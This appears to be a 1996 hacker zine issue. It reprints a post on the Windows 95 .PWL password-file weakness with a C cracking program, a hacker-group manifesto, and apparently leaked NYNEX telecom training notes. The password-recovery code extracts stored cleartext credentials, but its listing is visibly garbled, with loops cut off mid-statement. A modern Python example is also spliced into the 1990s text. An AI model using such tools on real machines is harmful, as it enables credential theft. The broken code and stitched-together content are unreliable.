* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, January, 1996

                        Edited by: Revolution


                         -------------------
                            Hackers Forums
                         -------------------

From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution

                         -------------------
                              Technology
                         -------------------

Windows.pwl cracked . . . . . . . . . . . . . . . . . . . . . .Tatu Ylonen
The X Files, Issue 0 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 1 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 2 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 3 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 4 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 5 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 6 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
Secure Shell Faq . . . . . . . . . . . . . . . . . . . . . . Thomas Koenig

                         --------------------
                               Politics
                         --------------------

CuD #7.01 . . . . . . . . . . . . . . . . . . . . . . . . . CuD Moderators
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution

----------------------------------------------------------------------------
copyright 1996 by Mike Scanlon  All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published by Mike Scanlon, to be added to the
subscription list or to submit articles mail mrs3691@hertz.njit.edu
----------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #1 of 12

                           From the Editor

For the first time in its short career, Hackers has already had problems
going out on time.
Of course, I can blame nobody but myself, seeing as I am the only one
working on this zine, so, I apologize. From now on I will try to get out
whatever I have, however skimpy it might be, on the first weekend of each
month.

The Virus and Bug of the month author positions are still wide open, if
anybody is interested, mail mrs3691@hertz.njit.edu, which is now the official
email address of the zine. Anyone else working in computer security, as a
hobbyist or professional, please don't be afraid to send articles in. I would
like to run the letters column monthly, but of course I can't do that without
reader input, so if you have any questions, flames, anything, you know where
to send them.

I was promised a few articles that never ended up getting in, so this issue
is mostly full of reprinted material (the X files), although it is material
worth reprinting. I included CuD 7.01, because it details the recent
CompuServe fiasco, which I think everybody should be aware of, as it affects
all of us in the long run, being the first time censorship has occurred on
such a large scale in the realm of cyberspace.

Anyway, enjoy!

                                                        - Revolution

* * * * * * * * * * * * * * * * * * * *

As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #2 of 12

                         Windows.pwl cracked

                             Tatu Ylonen

[This post was originally discovered while reading through some bugtraq
posts; the credit should really be given to Frank Andrew Stevenson for the
crack.
                                                        -Revolution]

Date: Mon, 4 Dec 1995 19:06:12 +0100
From: Tatu Ylonen
To: ssh@clinet.fi
Subject: FWD from Frank Andrew Stevenson: Cracked: WINDOWS.PWL

I am sorry to send noise to the list; this deals with Windows95 but is quite
relevant to many Unix administrators as well.
This is not related to ssh. The ssh list is not intended for this kind of
stuff, so please don't do what I am doing now.

Basically, you should be aware that if you ever mount disks from Unix
machines to Windows95 machines, the passwords of the unix machine (or your
other file servers) will be stored on the Windows machine's disk essentially
in the plain, and any 10-year computer-literate kid with a little knowledge
will be able to retrieve them in seconds if he gets access to client machine.

The message below explains the details. Essentially it means that the whole
encryption scheme used by Microsoft in Windows95 is a Bad Joke. Not only does
it use too short keys (breakable by brute force in 8 hours on a normal
workstation), but additionally it screws up the implementation, meaning that
your keys can be trivially decrypted in a fraction of a second without ever
even brute-forcing the key. The program to do this is below.

I find this kind of "security" shocking. I think this should go to the mass
media. At least make people at your sites aware of this fiasco.

    Tatu

------- start of forwarded message (RFC 934 encapsulation) -------
From: Frank Andrew Stevenson
To: cypherpunks@toad.com
Subject: Cracked: WINDOWS.PWL
Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET)

A few days ago Peter Gutmann posted a description on how Windows 95 produces
RC4 keys of 32 bits size to protect the .pwl files. I verified the
information and wrote a program to decrypt .pwl files with a known password,
I then discovered that the .pwl files were well suited for a known plaintext
attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl files contains the username, which is the same
as the filename, in capitals, padded with 0x00. From then I wrote a program
to bruteforce the .pwl file and optimized it so it would run in less than 24
hours on an SGI.
I run a test of the bruter software and recovered an unknown rc4 key in 8
hours, but the decrypted file was still largely unintelligible, I then
proceeded to decrypt the file at all possible starting points, and discovered
valuable information (cleartext passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it generates a long
pseudo random stream that it uses to XOR the data byte by byte. This isn't
necessarily weak encryption if you don't use the same stream twice: however
WIN95 does, every resource is XORed with the same pseudo random stream.
What's more the 20 first bytes are easy to guess. This is easy to exploit:
XOR the 20 bytes starting at position 0x208 with the user name in uppercase,
and slide this string through the rest of the file (xoring it with whatever
is there) this reveals the 20 first bytes of the different resources.

From there I went on to study the structure of the .pwl file it is something
like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp
rs???????
rs
rs
rs???????????
rs???????

where wp is a word pointer to the different resources (from start of pwl
file). The 2 first bytes of the resource (rs) is its length in bytes (of
course XOR with RC4 output). It is then fairly easy to find all the resource
pointers by jumping from start of resource to next resource, had it not been
for the fact that the size sometimes is incorrect (courtesy of M$).

What follows is a short c program that tries to remedy this and reconstruct
the pointertable thus generating at least 54 bytes of the RC4 pseudorandom
stream, and then proceeds to decrypt as much as possible from the different
resources.

What does this show? Although RC4 is a fairly strong cipher, it has the same
limitations as any XOR streamcipher, and implementing it without sufficient
knowledge can have dire consequences. I strongly suggest that the programmers
at Microsoft do their homework before trying anything like this again!
DISCLAIMER: This is a quick hack, I don't make any claims about usefulness
for any purpose, nor do I take responsibility for use nor consequences of use
of the software. FUNCOM of Norway is not responsible for any of this, (I
speak for myself, and let others speak for themselves)

This source is hereby placed in the public domain, please improve if you can.

--- glide.c ---

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

main (int argc,char *argv[]) {
  FILE *fd;
  int i,j,k;
  int size;
  char ch;
  char *name;
  int cracked;
  int sizemask;
  int maxr;
  int rsz;
  int pos;
  int Rall[300]; /* resource allocation table */

  if (argc<2) {
    printf("usage: glide filename (username)");
    exit(1);
  }

  /* read PWL file */
  fd=fopen(argv[1],"rb");
  if(fd==NULL) {
    printf("can't open file %s",argv[1]);
    exit(1);
  }
  size=0;
  while(!feof(fd)) {
    Data[size++]=fgetc(fd);
  }
  size--;
  fclose(fd);

  /* find username */
  name=argv[1];
  if(argc>2) name=argv[2];
  printf("Username: %s\n",name);

  /* copy encrypted text into keystream */
  cracked=size-0x0208;
  if(cracked<0) cracked=0;
  if(cracked>1000) cracked=1000;
  memcpy(keystream,Data+0x208,cracked );

  /* generate 20 bytes of keystream */
  for(i=0;i<20;i++) {
    ch=toupper(name[i]);
    if(ch==0) break;
    if(ch=='.') break;
    keystream[i]^=ch;
  };
  cracked=20;

  /* find allocated resources */
  sizemask=keystream[0]+(keystream[1]<<8);
  printf("Sizemask: %04X\n",sizemask);

  for(i=0;i<256;i++) Rall[i]=0;

  maxr=0;
  for(i=0x108;i<0x208;i++) {
    if(Data[i]!=0xff) {
      Rall[Data[i]]++;
      if (Data[i]>maxr) maxr=Data[i];
    }
  }
  maxr=(((maxr/16)+1)*16); /* resource pointer table size appears to be
                              divisible by 16 */

  /* search after resources */
  Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */
  for(i=0;i> 8) & 0x00ff;
  }
  cracked+=maxr*2+2;

  printf("%d bytes of keystream recovered\n",cracked);

  /* decrypt resources */
  for(i=0;i < maxr;i++) {
    rsz=Rpoint[i+1]-Rpoint[i];
    if (rsz>cracked) rsz=cracked;
    printf("Resource[%d] (%d)\n",i,rsz);
    for(j=0;j

E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #3 of 12

                        __
                   \ /  |_
                   / \ e n o n  |  o u n d a t i o n

                              presents:

                             \    /
                  *------ the \  /
                              /  \ files ------*
                             /    \

                              Issue: 0
                              Feb/1994

                            Introduction
                           By: Erik Turbo

    "Yes, we are the men in black hats, taking advantage of your stupidity
to gain information and knowledge about the world around us, while the man on
the corner is selling drugs to your children. While rapists, child molesters,
murderers, and common thieves are taking advantage of the justice system, we
are protecting what we believe in; the freedom to learn. You claim we invade
other's privacy, while you are in the process of creating universal
encryption standards that you can easily decipher. You claim we are the
villains of the information age, as you assassinate another president, cover
up more information, and make shady deals with yet another foreign leader.

    Let me inform you of the ongoing state of mind, the attitude, the power,
that is the Xenon Foundation. We are a handful of collective intelligence, of
revolutionaries, if you will, who have combined forces to fight the horrid
system of oppression we call the government. First of all, we have been, and
always shall be first and foremost, computer intruders. Hackers, crackers,
thieves, criminals, call us what you will, but we are not any of those. We
are crusaders, on a relentless mission to gather as much information and
knowledge as humanly possible, using the most powerful medium known to man -
the computer - to aid us. Combine that medium with that of the telephone
network and you've got an endless stream of data - of information - flowing
directly through your computer, into your brain, into your soul. Feed your
brain with what your consciousness craves.
Liberate yourself, my friend, and take the plunge into the electronic sea of
digital data. Unearth the mass of 1's and 0's that have been intentionally
covered up by the vile powers that be, to protect us."

    Welcome to "the-X-files." At last, from the guild of secrets, the Ring
of Five, and out of the confines of secrecy, are the Xenon Foundation's most
sacred works, including some of the most extensive technical volumes that
have ever been combined into any series of digital text.

To receive the-X-files via Internet mail, contact:
    xfiles@bic.ponyx.com

To submit an article for publication as an X file, mail:
    submit@bic.ponyx.com

All other mail to the Xenon Foundation should be submitted to:
    xenon@bic.ponyx.com

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #4 of 12

                        __
                   \ /  |_
                   / \ e n o n  |  o u n d a t i o n

                              presents:

                             \    /
                  *------ the \  /
                              /  \ files ------*
                             /    \

        Fall/1993                                   Issue: 1

              INTRODUCTION TO BASIC DIGITAL TECHNOLOGY

                       Written by: Erik Turbo

                            File: 1 of 6


1. Analog to Digital Conversion

1.1 Introduction

Data communication is simply sending information from one location to
another by coded signals. There are three minimum components all
communications systems have regardless of how complex or simple the system
is. Those three components are:

   1. a transmitter
   2. a receiver
   3. a transmission path between the transmitter and receiver

Information is sent over communication systems from one location to another
via data signals. There are two basic types of signals:

   > Analog
   > Digital

On the next few pages you will read about analog and digital technology.
Analog technology is used by customers that do not require sending
information at high speed. Currently Analog services are cheaper than digital
services but this will not always be the case.
Analog technology offers neither the reproduction quality nor the vast
services which are offered with digital technology. Digital technology has
only become available in the 80's.

1.2 Overall Configuration And Digital Concepts

   Central Office 1                 Central Office 2
   _______________                  ________________
  |      D4       |                |       D4       |
  |     _____     |                |     _____      |       ___________
  |    |     |====|================|====|     |     |      |           |
  |    | FXO |    |                |    | FXS |     |======| TELEPHONE |
  |    |     |    |                |    |     |     |      |___________|
  |    |_____|====|================|====|_____|     |
  |               |                |                |
  |_______________|                |________________|

The FX Circuit configuration above contains groups of components that
comprise most Special Service Circuits. These components include the
following:

   > Switching Equipment
   > Facilities:
        - Exchange
        - Interoffice
   > Facility Terminal Equipment
   > All three component groups exist in either an Analog or Digital
     environment

1.3 Analog Signal Characteristics

An Analog signal is a continuously varying voltage and current quantity
representing the human voice. The amplitude represents the loudness and the
number of cycles per second represents the voice frequency.

Characteristics of the Analog signal are:

   1. The signal is continuous in time.
   2. All values are permitted in the positive maximum limits defined.
   3. In Analog transmission systems, the sound being transmitted is
      represented by the shape of the Analog signal.

1.4 Analog Signal Generation

                  __________________
          \      |                  |      /
           \     |                  |     /
            |    |     VARIABLE     |    |
 SOUND -->  |====|     RESISTOR     |====|  ----> REPRODUCED
 WAVE       |    |                  |    |        SOUND
           /     |                  |     \       WAVE
     1    /   2  |        3         |  4   \
                  ------------------

                Analog Signal Generation

The generation of an Analog signal takes the following steps:

   1. When a person speaks into the transmitter of a telephone set, changes
      in the air pressure, sound waves, are sensed by the diaphragm (2)
   2. The diaphragm responds to changing air pressure and changes circuit
      resistance by compressing carbon in the transmitter.
   3.
      The change in resistance causes current flow to fluctuate, creating an
      electrical wave analogous to the sound wave.
   4. Fluctuating current flows through the coil and vibrates the receiver
      diaphragm, which reproduces the sound wave.

AN ANALOG SIGNAL IS A CONTINUOUSLY VARYING REPRESENTATION OF A SOUND WAVE.

1.5 Analog Waves - Components

An Analog signal is composed of amplitude and frequency. These components
define the sound wave an Analog signal represents. The amplitude and
frequency are two characteristics of the analog signal that can be varied to
convey information.

Amplitude is the measure of the volume or loudness of the Analog signal.
Amplitude is the relative strength of the signal. Frequency is the number of
cycles in a unit of time.

1.6 Frequency

Frequency is related to the pitch of a sound. Frequency is measured in Hertz
(Hz) - The number of cycles or oscillations per second.

Frequency and amplitude relationships:

   1. Low frequency, low amplitude - whispering at a low pitch.
   2. Low frequency, high amplitude - yelling at a low pitch.
   3. High frequency, low amplitude - whispering in a high pitch.
   4. High frequency, high amplitude - yelling at a high pitch.

1.7 Analog Signal Impairments

   > Loss - Attenuation
   > Noise - Unwanted Electrical Signals
   > Distortion - Frequency Characteristic Changes

Attenuation (Loss) and Amplification.

The ideal transmission channel will deliver an accurate replica of the
original signal to the receiving terminal. Three major problems affect the
transmission of Analog signals:

   1. LOSS - Weakening of the signal
   2. NOISE - Unwanted electrical signals that interfere with the information
      signal.
   3. DISTORTION - Changing of the frequency characteristics of the signal.

1.8 Analog Signal Attenuation and Amplification

   > The signal is continuously attenuated, or weakened, as it progresses
     along the transmission medium.
   > The signal is then amplified at intervals to compensate for the
     attenuation.
   > Line loss can be overcome by properly spacing amplifiers in the circuit.

1.9 Amplifying Distorted Signals

   > The Analog signal is also affected by noise and distortion.
   > Analog signals pick up noise as they travel through the network.
   > Noise and distortion change the shape of the Analog signal.
   > Amplifiers are designed to reproduce all of the variation of the Analog
     signal; the amplifier cannot distinguish between the voice, noise, and
     distortion components of the Analog signal.
   > The amplifier amplifies the entire input signal, thus the noise is
     amplified along with the original signal.
   > As the signal path increases in length and more amplification is needed,
     more noise is introduced.
   > The effects of noise and distortion are cumulative along the Analog
     transmission system.

1.10 Analog Signal Disadvantage

   > The major disadvantage of Analog transmission systems is the cumulative
     nature of transmission impairments.
   > Loss can be overcome by amplification to increase the signal to its
     original value. Noise is also amplified.
   > Once introduced, the effects of noise and distortion cannot be
     eliminated.
   > Digital transmission systems solve the "Analog Problem."

1.11 Digital Transmission Concepts

Digital Signal Definition

A Digital signal is a discontinuous signal in the form of pulses. Good
examples would be flashes of light, telegraph clicks, and dialing pulses. A
transmitted Digital signal generally represents a series of on/off pulses,
transmitted at a steady rate and amplitude.

1.12 Digital Signal Regeneration

Digital transmission systems solve the basic "Analog Problem" of cumulative
effects of noise and distortion by regenerating rather than amplifying the
transmitted signal. The regenerative repeater detects the presence of a
pulse, (signal), and creates a new pulse, (signal), based on a sample of the
existing signal. The regenerated signal duplicates exactly the signal
originally transmitted.
This eliminates the cumulative effects of noise and distortion inherent in
Analog facilities. Distortion is not amplified as it is in an Analog signal;
it is omitted when the signal is regenerated.

1.13 Comparison of Analog and Digital Signals

The Analog signal is a signal that varies in a continuous manner over a wide
range of amplitude and time. As you know, in Analog transmission, amplifiers
were used to boost the strength of the signal. With Analog signal
transmission, the line noise is amplified along with the signal at each
repeater point. Thus, as the distance increases, so does the distortion.

The Digital signal is a series of pulses, all having a specified amplitude
and duration in time. A Digital signal has only a discrete number of states,
0 or 1. This on/off state simplifies the process of detecting and
regenerating the digital bit stream. Instead of amplifying the signal, a
regenerator produces a fresh signal based on a sample of the existing signal.
By using this method, noise does not accumulate. At each repeater location,
the incoming Digital signal is regenerated into the correct 0 or 1 signal,
while the associated line noise is ignored.

1.14 Analog to Digital Conversion - Overview

                                              1   1  0  1  0  1   1
 /\       ______    __________     ________   _   _     _     _   _
/  \  /==|      |  |          |   |        | | | | |   | |   | | | |
    \/   |SAMPLE|==| QUANTIZE |===| ENCODE |_| |_| |___| |___| |_| |__
ANALOG   |______|  |__________|   |________|
SIGNAL

                    Analog to Digital Conversion

Converting an Analog signal to a Digital signal requires the steps of
sampling, quantizing, and encoding.

   > Sampling

     In the sampling process, portions of a signal are used to represent the
     whole signal. Each time the signal is sampled, a Pulse Amplitude
     Modulation (PAM) signal is generated. In order to accurately reproduce
     the Analog signal (speech), a sampling rate of at least twice the
     highest frequency to be reproduced is required.
     Because a majority of voice frequencies are less than 4 KHz, an 8 KHz
     sampling rate has been established as the standard.

   > Quantizing

     In order to obtain the Digital signal, the Pulse Amplitude Modulation
     (PAM) signal is measured and coded. The amplitude or height of the PAM
     is measured to derive a number that represents its amplitude level.

   > Encoding

     The decimal (Base 10) number derived in the quantizing step is then
     converted to its equivalent 8 bit binary number. The output is an 8 bit
     "word" in which each bit may be either a "1" (pulse) or a "0" (no
     pulse). This process is repeated 8,000 times a second for a telephone
     voice channel service.

1.15 Filtering

The range of frequencies in the human voice approximates 50 Hz to 20,000 Hz.
Telephone transmission systems are arranged to transmit Analog signals
between 200 Hz and 4,000 Hz. Extreme frequencies below 200 Hz and above
4,000 Hz are removed by a process called Filtering.

1.16 Sampling

The sampler measures the filtered Analog signal 8,000 times a second, or
once every 125 microseconds (u sec.) The value of each of these samples is
directly proportional to the amplitude of the Analog signal at the time of
the sample. The sampling process is called Pulse Amplitude Modulation (PAM)

1.17 Quantizing

Quantizing is essentially matching the PAM signals to one of the 255 numbers
on a segmented scale. The quantizer measures the amplitude or height of each
PAM signal coming from the sampler and assigns it a value from -127 to plus
127.

1.18 Pulse Code Modulation (PCM) Encoding

Encoding involves the conversion of the number that was determined in the
quantizing step, to a binary number. Each quantized PAM signal is converted
into an 8-bit binary "word" in which each bit may be either a "1" (pulse) or
a "0" (no pulse). The 8-bit "word" represents the binary equivalent of the
number from the quantizing step.
1.19 PCM Encoding Example

If the Pulse Amplitude Modulation (PAM) signal measures +45 on the
quantizing scale, the output of the encoding step is the 8-bit word
"10101101" (ie: the binary equivalent of +45.)

1.20 Digital to Analog Conversion

At the receiving terminal the following occurs:

   > The Digital pulses are converted back to the original Analog signal.
   > The Pulse Code Modulation (PCM) signals are decoded to the Pulse
     Amplitude Modulation (PAM) signals they represent.
   > The succession of PAM signals are passed through a filter, thereby
     reconstructing the original analog wave form.

1.21 Conclusion

Some customers are still using analog technology for services like FX lines,
POT lines, WATTS lines and voice services. These customers feel they don't
need the high speed or the quality of digital services. Currently the Analog
services are cheaper than the Digital services, although this could change.

In our fast paced environment many customers want higher speed
communications with top quality. Digital technology provides this and allows
our customers to send data and voice communications simultaneously.

Our jobs will be influenced greatly by the new services our customers want,
which only digital technology can provide. You will learn about the services
which only digital technology can offer later on in this manual.

                                NOTICE

Not for use or disclosure outside the NYNEX Corporation or any of its
subsidiaries except when rightfully stolen.

------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #5 of 12

                        __
                   \ /  |_
                   / \ e n o n  |  o u n d a t i o n

                              presents:

                             \    /
                  *------ the \  /
                              /  \ files -----*
                             /    \

        Fall/1993                                   Issue: 2
              INTRODUCTION TO BASIC DIGITAL TECHNOLOGY

                       Written by: Erik Turbo

                            File: 2 of 6


2. Time Division Multiplexing (TDM)

2.1 Defining Multiplexing

Multiplexing basically combines or merges a number of signals into one
composite signal. The most common type of multiplexer at NET is called a
TIME DIVISION MULTIPLEXER.

Time Division Multiplexing

In the telephone industry, the D Channel Bank Time Division Multiplexer is
the type most commonly used and the one you will probably use. The D Channel
Bank Time Division Multiplexer works by taking twenty four (24) voice
channels and time division multiplexing them at the near end terminal. Then
the signals are sent over a pair of wires to the far end terminal. This same
process is occurring at the far end terminal. The signal from the far end
terminal is sent over another pair of wires to the near end terminal. Each
terminal is equipped to restore the signal received to its original form.

Time Division Multiplexing is used to take low speed information, sample it,
and then send this information over a high speed data line. Each time all
twenty four (24) channels have been sampled and sent, a framing signal is
sent. This framing signal aids the far end terminal in identifying and
reassembling all of the information for each channel. This process is known
as synchronizing data.

On the next page you will learn how the sampled signals are quantized and
encoded by a process called Pulse Code Modulation (PCM) before they are
transmitted via Time Division Multiplexing to a distant terminal.

2.2 Multiplexing--Pulse Code Modulation (PCM)

   > At 8,000 samples per second, a single channel is sampled once per 125
     micro-seconds. Each sample uses 5.2 microseconds of time.
   > There are approximately 120 microseconds of idle time between each
     sample on a single channel Pulse Code Modulation (PCM) facility.
   > To make efficient use of the facility, many samples are sent on the
     same path, which is called multiplexing.
2.3 Pulse Code Modulation (PCM) Frame

A Frame requires 125 microseconds to transmit and contains one encoded
sample (8-bit word) for each channel that is multiplexed, plus the framing
bit. The Frame is sub-divided into Time Slots. A Time Slot represents the
time required to send one 8-bit word. The basic Pulse Code Modulation (PCM)
bit stream contains 1,544,000 bits/sec.

2.4 DS1 Bit Rate Computation

            24   CHANNELS
      x      8   BITS/WORD
           192   BIT
      +      1   FRAMING BIT
           193   BITS/FRAME
      X   8000   TIMES/SEC
       1544000   BITS/SEC   OR   1.544 M BITS/SEC

2.5 Time Division Multiplex (TDM)

   > This diagram shows the overall digital transmission system.
   > The Analog signal is sampled 8000 times a second via a process called
     Pulse Amplitude Modulation (PAM). The Pulse Amplitude Modulation (PAM)
     sample represents the amplitude of the signal at the time of sampling.
   > Each Pulse Amplitude Modulation (PAM) sample is quantized and encoded to
     an 8-bit Digital signal via a process called Pulse Code Modulation
     (PCM).
   > The Pulse Code Modulation (PCM) samples from all 24 channels are
     combined via a process called Time Division Multiplexing and transmitted
     to a distant terminal over a common path.
   > At the distant terminal, the Pulse Code Modulation (PCM) samples are
     decoded, demultiplexed and filtered to reconstruct the original Analog
     waveform.

2.6 Conclusion

Multiplexing is vital to our business because it allows us to take advantage
of the idle time between samples on each single channel Pulse Code
Modulation (PCM) facility. The idle time is used efficiently via
multiplexing which allows us to send many samples on the same path. So
multiplexing maximizes efficient use of the facility and reduces idle time
by sending numerous samples over the same path.

                                NOTICE

Not for use or disclosure outside the NYNEX Corporation or any of its
subsidiaries except when rightfully stolen.
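
Added example (not part of the original X file, and not NYNEX or Xenon
Foundation code): the frame layout of sections 2.2 through 2.5, using the
8-bit word format implied by the +45 example in section 1.19, worked in
Python together with the receiver-side frame alignment that the text calls
"synchronizing data". The alternating framing-bit pattern, the framing bit's
place at the end of each frame, and every function name are assumptions made
here; the file only states that one framing bit accompanies each frame.

```python
# Added illustration; assumptions are marked in the comments.
CHANNELS = 24                            # voice channels per channel bank (2.1)
WORD_BITS = 8                            # one PCM word per channel per frame (2.3)
FRAME_BITS = CHANNELS * WORD_BITS + 1    # 192 data bits + 1 framing bit = 193
FRAMES_PER_SEC = 8000                    # one frame every 125 microseconds
DS1_BIT_RATE = FRAME_BITS * FRAMES_PER_SEC   # 1,544,000 bits/sec (2.4)


def pcm_encode(level):
    """Quantized level (-127..+127) -> 8 bits: sign bit (1 = positive), then a
    7-bit magnitude. This matches the text's +45 -> 10101101 example; it is a
    simplification, not the companded coding used by real channel banks."""
    if not -127 <= level <= 127:
        raise ValueError("level outside the quantizing scale")
    sign = 1 if level >= 0 else 0
    return [sign] + [(abs(level) >> shift) & 1 for shift in range(6, -1, -1)]


def pcm_decode(word):
    """Inverse of pcm_encode for one 8-bit word."""
    magnitude = 0
    for bit in word[1:]:
        magnitude = (magnitude << 1) | bit
    return magnitude if word[0] else -magnitude


def multiplex(frames):
    """frames: list of 24-sample lists (one sample per channel) -> bit list.
    Assumption: the framing bit follows the 24 words and alternates 1,0,1,0."""
    stream = []
    for number, samples in enumerate(frames):
        if len(samples) != CHANNELS:
            raise ValueError("a frame carries exactly 24 samples")
        for level in samples:
            stream.extend(pcm_encode(level))
        stream.append(1 - number % 2)
    return stream


def find_frame_start(stream, min_frames=4):
    """Return the index where the first whole frame begins, or None.
    The receiver does not know where it joined the bit stream, so it tries all
    193 alignments and keeps the one whose framing column alternates. Voice
    data that happens to alternate at the frame rate would fool this check;
    that is why a real framer uses a longer pattern and waits for it to
    persist before declaring alignment."""
    for start in range(FRAME_BITS):
        column = stream[start + FRAME_BITS - 1::FRAME_BITS]
        if len(column) >= min_frames and all(
                a != b for a, b in zip(column, column[1:])):
            return start
    return None


def demultiplex(stream):
    """Align on the framing bit, then decode every complete frame."""
    start = find_frame_start(stream)
    if start is None:
        raise ValueError("no frame alignment found")
    frames = []
    while start + FRAME_BITS <= len(stream):
        data = stream[start:start + FRAME_BITS - 1]
        frames.append([pcm_decode(data[i:i + WORD_BITS])
                       for i in range(0, len(data), WORD_BITS)])
        start += FRAME_BITS
    return frames


def constructed_frames(count=12):
    """Constructed sample data: each channel cycles through three levels, so
    no data column can alternate for four frames in a row."""
    levels = [45, -12, 100]
    return [[levels[(ch + f) % 3] for ch in range(CHANNELS)]
            for f in range(count)]


if __name__ == "__main__":
    sent = constructed_frames()
    line = multiplex(sent)[50:]          # receiver joins 50 bits into frame 0
    print("bit rate:", DS1_BIT_RATE)
    print("first whole frame starts at bit", find_frame_start(line))
    print("recovered frames match:", demultiplex(line) == sent[1:])
```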
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #6 of 12

                        __
                   \ /  |_
                   / \ e n o n  |  o u n d a t i o n

                              presents:

                             \    /
                  *------ the \  /
                              /  \ files ------*
                             /    \

        Fall/1993                                   Issue: 3

              INTRODUCTION TO BASIC DIGITAL TECHNOLOGY

                       Written by: Erik Turbo

                            File: 3 of 6


3. Channel Banks

3.1 Introduction

In this next section you will learn about a typical digital facility. Most
digital facilities contain:

   > Channel Banks
   > A Transmission System

You will learn about the channel banks and a typical transmission system
which includes:

   > Loop Plant
        - Loop Cables
        - Impairments
        - Digital Loop Carrier (DLC)
        - SLC 96--Mode 3

3.2 Digital Channel Banks

   > The function of the digital facility is to provide 24 Voice Frequency
     (VF) channels from one point to another over a PCM transmission system.
     The most basic type of digital facility consists of two elements:

        1. Channel Banks (or terminals)
        2. A Transmission System

   > The channel banks provide the A/D interface between 24 VF circuits and
     a digital Pulse Code Modulation (PCM) transmission system. The digital
     transmission signal between two channel banks.

3.3 Loop Plant

The loop plant is the connection between the telephone customer and the
serving Central Office. Most loops are quite short, the median length is
about 1.7 miles.

   1. Loop Cables

      The loop plant generally consists of metallic cable pairs. Typical
      cable gauges are the 19, 22, 24, or 26 gauge. The higher the gauge
      number, the smaller the wire diameter and the more resistance per foot.

         CABLE GAUGE               OHMS/KFT
         -------------------------------------
             26                      83.2
             24                      51.9
             22                      32.8
             19                      16.3

   2.
      Impairments

      As the distance from the Central Office increases, so does
      transmission loss. Switching systems and telephone equipment are
      designed to operate at specified limits, therefore, the loop plant is
      generally limited without treatment from 1,300 to 1,500 ohms. In
      addition to the resistance, another factor that impacts transmission
      is loop capacitance.

   3. Digital Loop Carrier (DLC)

      The loop capacitance results in greater loss at the higher
      frequencies. To care for this, loop cables over 18 Kft are equipped
      with load coils. New loop cable configurations, longer than 24 Kft,
      generally use Digital Loop Carrier (DLC) such as SLC 96.

3.4 Digital Loop Carrier (DLC)

Digital Loop Carrier (DLC) systems are being installed in significant
numbers, about 50,000 DS1 lines per year, to provide new services and reduce
cost. The systems in use include AT&T SLC 96 system, Northern TELECOM's DMS-1
Urban, and systems from other vendors.

The SLC 96 system is a digital subscriber carrier system which provides up
to 96 subscriber lines. It provides residential, coin, and special services.
SLC 96 operates in three modes with Mode 3 used for special service
including Digital Data Services (DDS) dataport.

This SLC 96 layout is similar to Mode 1 and Mode 2 having a Central Office
(CO) and Remote Terminal (RT). The major difference is that the channels are
reduced from 24 to 12 for each bank. D4 Channel units can be used in the SLC
96 Mode 3 arrangement.

The Mode 3 arrangement has two T1 (DS1) lines plus one T1 for protection in
case of a line problem on either of the service lines.

------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

                         -= H A C K E R S =-

                       Issue #5, File #7 of 12

                        __
                   \ /  |_
                   / \ e n o n  |  o u n d a t i o n

                              presents:
\ / ...*------ the \ / .... / \ files ------* .... / \ .. ... Fall/1993 Issue: 4 .. .. INTRODUCTION TO BASIC DIGITAL TECHNOLOGY ... Written by: Erik Turbo .... .... File: 4 of 6 .. . 4. Digital Transmission 4.1 Interoffice Facilities Below is a list of interoffice facilities required for digital transmission of data. 1. VF Facilities A small number of Special Services circuits use VF, Voice Frequency, pairs for the facility between Central Offices. a. MFT Equipment The Metallic Facility Terminal (MFT) is the AT&T family of plug-in equipment developed to provide transmission and/or signaling fuctions required for metallic facilities. MFT provides the interfect between VF metallic circuits and switching systmes, station equipment, or another metallic cable. In addition to metallic facilities, micro-wave radio is utilized for both digital and analog transmission. Fiber-optic facilites are also utilized for digital transmission. 2. Carrier Facilities Carrier facilities, both analog and digital, are pair gain devices. They are more economic than using Voice Frequency (VF) metallic cable pairs. 3. Digital Transmission Systems a. Digital Hierarchy Digital terminals are connected together by an almost countless number of facility and equipment configurations. b. Digital Channel Banks The most common channel banks used by the BOCs are the AT&T D4 and D5 terminals. The channel units provide transmission and signalling features required to interface with 2 or 4 wire circuits. 4.2 T1 Carrier Line The T1 line carries DS1 signals (1.544 Mb/s) between signal digroup channel banks using four-wire bidirectional transmission over standard cable pairs. 4.3 Digital Line Coding > Bipolar Coding Bipolar coding is the basic 